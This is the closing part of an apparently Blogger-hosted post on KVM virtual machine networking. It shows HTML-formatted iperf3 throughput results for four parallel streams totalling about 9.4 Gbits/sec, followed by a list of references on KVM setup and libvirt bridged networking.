<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">3.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">4.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">465</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">3.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">4.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">427</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">3.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">4.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">533</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">3.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">4.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">498</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">3.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">4.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.39</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">4.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">5.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">530</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">4.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">5.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">430</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">4.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">5.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">281</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">533</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">4.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">5.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">498</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">4.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">5.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.40</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">5.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">6.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">619</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">5.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">6.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">438</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">5.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">6.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">533</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">5.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">6.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">498</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">5.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">6.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.38</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">6.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">7.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">735</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">6.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">7.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">445</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">6.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">7.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">533</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">6.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">7.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">501</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">6.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">7.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.38</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">7.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">8.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">871</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">7.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">8.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">448</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">7.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">8.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">281</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">539</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">7.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">8.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">513</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">7.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">8.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.39</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">8.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">9.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">1.05</span> <span style="color: white;">MBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">8.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">9.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">448</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">8.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">9.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">550</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">8.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">9.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">523</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">8.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">9.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.39</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">9.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">281</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.36</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">1.25</span> <span style="color: white;">MBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">9.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">281</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">479</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">9.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">576</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">9.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">546</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">9.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.10</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.41</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: white;">ID]</span> <span style="color: white;">Interval</span> <span style="color: white;">Transfer</span> <span style="color: white;">Bitrate</span> <span style="color: white;">Retr</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">2.73</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">sender</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.03</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">2.74</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: white;">receiver</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">2.73</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">sender</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.03</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">2.74</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: white;">receiver</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">2.73</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">sender</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.03</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">2.74</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: white;">receiver</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">2.73</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">sender</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.03</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">2.74</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: white;">receiver</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">10.9</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.39</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">sender</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10.03</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">11.0</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.39</span> <span style="color: white;">Gbits/sec</span> <span style="color: white;">receiver</span>
</pre>
</div>
<br />
<br />
<h3>
References</h3>
<a href="http://hilite.me/">Convert code to HTML for Blogger</a><br />
<a href="https://www.cyberciti.biz/faq/how-to-clone-existing-kvm-virtual-machine-images-on-linux/">How to clone existing KVM virtual machine images on Linux</a><br />
<a href="https://linuxconfig.org/install-and-set-up-kvm-on-ubuntu-18-04-bionic-beaver-linux">Install And Set Up KVM On Ubuntu 18.04 Bionic Beaver Linux</a><br />
<a href="https://www.linux.com/learn/create-and-run-virtual-machines-virt-manager">Create and Run Virtual Machines With virt-manager</a><br />
<a href="https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/">Predictable Network Interface Names</a><br />
<a href="https://jamielinux.com/docs/libvirt-networking-handbook/bridged-network.html">libvirt Networking Handbook</a><br />
<a href="https://help.ubuntu.com/community/KVM/Networking"> KVM/Networking</a><br />
